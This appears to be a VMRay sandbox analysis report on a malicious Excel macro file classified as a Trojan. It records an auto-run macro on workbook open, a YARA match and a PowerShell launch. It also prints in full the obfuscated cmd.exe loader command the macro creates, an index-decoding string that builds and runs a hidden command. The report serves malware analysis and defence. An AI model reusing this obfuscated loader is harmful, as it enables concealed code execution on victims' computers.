f39618fb...4371 | VTI
Try VMRay Analyzer
VTI SCORE: 98/100
Dynamic Analysis Report
Classification: Trojan

f39618fbdbb3788fa9444c84522a069b867e3237567ddd722f5e9a42838a4371 (SHA256)

201810302482 (1).xls

Excel Document

Created at 2018-10-31 01:20:00

Severity Category Operation Classification
4/5
Process Creates process -
  • Creates process "cmd /V:ON/C"set d0=rMc5( ""Fj$hEJOYU2uwf=ip7CGdI-klmngTR,H34/^|B]Lbs'o%AXvy1[V_0{D;+:}*^&x\aPSW6^^9`etK).N&&for %x in (12,2,11,14,5,5,5,75,75,75,67,4,7,60,17,65,60,55,65,60,59,65,7,5,29,20,5,48,12,1,48,37,48,28,35,48,37,48,72,12,35,29,48,81,5,5,4,7,60,55,65,60,17,65,60,59,65,7,5,29,20,48,17,27,26,48,37,48,53,51,48,37,48,0,22,70,46,31,78,64,48,81,5,5,4,5,5,56,35,54,71,12,44,4,7,60,59,65,60,55,65,7,29,8,5,48,1,51,35,48,37,48,38,48,81,5,5,81,62,5,5,82,4,7,60,59,65,60,55,65,60,17,65,7,5,29,20,5,48,47,12,48,37,48,79,29,48,37,48,22,79,12,1,48,81,5,5,4,7,60,55,65,60,59,65,60,17,65,60,40,65,60,39,65,7,29,20,5,48,70,48,37,48,53,70,0,22,48,37,48,43,48,37,48,27,26,83,57,48,37,48,31,12,64,48,81,5,4,5,56,35,54,71,12,44,4,7,60,40,65,60,55,65,60,59,65,60,39,65,60,17,65,7,5,29,8,5,48,82,12,83,25,48,37,48,12,32,82,35,78,52,35,48,37,48,33,26,48,37,48,14,27,22,48,37,48,47,54,47,35,48,81,5,5,81,5,5,62,5,5,75,75,75,67,4,7,60,59,65,60,55,65,7,5,29,20,5,48,47,48,37,48,70,31,48,81,5,4,48,70,48,81,5,4,7,60,59,65,60,55,65,60,17,65,7,29,20,48,83,78,19,29,14,46,9,78,48,37,48,2,48,37,48,79,48,81,62,82,4,7,60,55,65,60,59,65,7,5,29,20,5,48,29,35,54,23,78,48,37,48,51,27,27,48,81,5,29,51,47,47,78,32,46,31,54,83,70,32,78,5,4,7,60,59,65,60,17,65,60,39,65,60,55,65,60,40,65,7,5,29,20,48,72,54,48,37,48,0,70,19,22,48,37,48,47,48,37,48,79,78,32,82,61,48,37,48,33,34,48,81,62,10,60,34,65,21,75,75,75,67,4,48,70,48,81,5,4,7,60,40,65,60,55,65,60,39,65,60,17,65,60,59,65,7,29,20,5,48,23,48,37,48,79,78,32,82,61,0,70,48,37,48,34,82,43,22,79,32,70,48,37,48,19,22,33,48,37,48,72,54,47,48,81,4,4,82,4,48,70,48,81,5,4,7,60,17,65,60,59,65,60,55,65,7,29,20,5,48,31,22,78,33,48,37,48,79,48,37,48,83,78,79,82,73,78,46,25,48,81,81,82,4,7,60,55,65,60,59,65,7,5,29,20,48,78,33,36,78,70,27,48,37,48,14,23,48,81,82,28,33,53,49,30,78,4,4,7,60,59,65,60,17,65,60,39,65,60,74,65,60,3,65,60,55,65,60,40,65,7,5,29,20,5,48,11,79,48,37,48,78,82,22,46,46,82,2,49,41,9,0,61,13,53,59,41,11,23,82,23,33,48,37,48,79,23,47,64,41,48,37,48,41,22,32,48,37,48,34,48,37,48,34,48,37,48,70,48,81,81,81,62,10,60,49,65,21,82,4,48,70,48,81,5,4,7,60,59,65,60,55,65,7,5,29,20,48,43,54,48,37,48,79,78,56,44,48,81,5,40,76,74,59,62,4,59,82,82,24,81,75,75,75,42,75,75,75,67,4,48,50,48,81,60,20,49,0,78,70,2,11,4,10,60,68,65,5,22,33,4,59,82,82,74,55,76,81,81,60,10,60,71,65,21,10,60,26,65,82,4,7,60,17,65,60,55,65,60,59,65,7,5,29,20,5,48,78,31,48,37,48,22,68,48,37,48,26,78,79,71,48,81,82,28,33,53,49,30,78,4,10,60,52,65,37,10,60,58,65,81,62,10,60,14,65,56,10,60,58,65,66,74,17,59,63,10,60,52,65,44,21,4,5,4,82,4,7,60,17,65,60,59,65,60,55,65,7,29,20,48,0,28,51,43,48,37,48,31,78,48,37,48,57,51,48,81,5,5,4,7,60,55,65,60,59,65,7,29,20,48,27,26,48,37,48,17,48,81,5,29,57,70,45,16,78,49,83,31,15,5,81,64,64,4,7,60,55,65,60,59,65,7,29,20,48,31,49,49,0,48,37,48,8,48,81,82,28,33,53,49,30,78,4,4,10,60,23,65,82,7,43,7,29,46,70,33,27,55,3,81,66,55,74,81,29,46,49,0,4,10,60,71,65,82,7,26,7,5,29,46,70,33,27,5,55,3,81,81,65,65,62,82,4,7,60,55,65,60,59,65,7,5,29,20,5,48,52,48,37,48,28,12,48,81,4,5,4,75,75,75,67,4,7,60,59,65,60,55,65,60,17,65,60,39,65,7,29,20,5,48,26,48,37,48,78,79,29,53,51,48,37,48,0,28,48,37,48,51,43,31,12,48,81,5,4,7,60,59,65,60,55,65,7,29,20,48,61,26,48,37,48,83,53,48,81,5,29,53,51,31,18,78,49,5,5,81,64,64,7,70,72,25,77,22,28,7,82,7,34,78,79,72,77,35,0,77,28,83,34,7,4,10,60,49,65,56,59,82,82,40,24,39,17,44,81,81,42,25,45,22,23,5,67,67,2,32,27,5,41,25,5,23,49,19,78,36,47,38,78,45,45,5,5,29,83,49,31,14,26,5,29,78,52,12,25,16,35,5,43,54,71,70,72,72,5,29,72,35,5,5,29,33,49,71,36,49,8,5,29,19,22,5,11,22,5,5,29,83,14,83,22,83,79,78,5,5,5,5,5,75,75,75,67,5,5,4,69,7,60,17,65,60,59,65,60,55,65,69,7,5,29,20,5,48,29,35,48,37,48,54,23,78,48,37,48,51,27,27,48,5,81,5,29,51,47,47,78,32,5,4,5,5,69,7,60,39,65,60,40,65,60,59,65,60,55,65,60,17,65,69,7,29,20,5,48,49,48,37,48,33,25,49,48,37,48,0,78,48,37,48,71,48,37,4,5,69,7,60,59,65,60,55,65,60,17,65,69,7,29,20,48,0,78,48,37,48,47,78,33,79,70,48,37,48,79,22,48,5,5,81,81,5,5,62,5,5,5,5,5,82,4,5,5,69,7,60,39,65,60,17,65,60,55,65,60,59,65,69,7,29,20,5,4,5,5,69,7,60,59,65,60,55,65,69,7,5,29,20,5,48,72,28,48,37,48,14,33,48,81,37,4,5,5,69,7,60,55,65,60,59,65,69,7,5,29,20,48,78,47,48,37,48,68,71,0,48,5,81,37,48,78,48,37,4,5,69,7,60,59,65,60,55,65,69,7,5,29,20,48,28,48,37,48,83,53,14,30,78,29,48,81,5,5,81,5,4,5,5,4,5,56,19,22,83,61,49,19,72,82,25,45,22,23,43,49,51,0,61,44,64,64,4,69,7,60,55,65,60,59,65,69,7,5,29,20,48,52,79,48,37,4,69,7,60,55,65,60,59,65,69,7,29,20,48,35,78,48,37,48,26,78,35,48,81,5,81,82,69,7,28,33,77,57,49,80,12,69,7,4,5,5,81,5,81,5,81,5,5,5,62,56,73,22,33,27,49,19,47,82,25,31,22,23,46,49,70,0,27,44,64,64,4,5,5,69,7,60,55,65,60,59,65,69,7,5,29,20,5,48,0,48,37,4,69,7,60,55,65,60,59,65,69,7,29,20,48,31,78,70,48,37,48,25,48,5,5,81,5,81,82,69,7,22,77,83,57,49,80,78,69,7,4,5,5,81,90)do set hoR=!hoR!!d0:~%x,1!&&if %x==90 cmd /C!hoR:*hoR!=!"".
  • Creates process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe".
4/5
File System Known malicious file Trojan
  • File "C:\Users\aETAdzjz\Desktop\201810302482 (1).xls" is a known malicious file.
3/5
YARA YARA match -
  • Rule "VBA_Execution_Commands" from ruleset "Generic" has matched for "C:\Users\aETAdzjz\Desktop\201810302482 (1).xls"
2/5
VBA Macro Executes macro on specific worksheet event -
  • Executes macro automatically on target "workbook" and event "open".
1/5
VBA Macro Contains Office macro -
Function Logfile
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Before

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
After

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Screenshot
Expand-Icon
Exit-Icon
icon_left
icon_left
image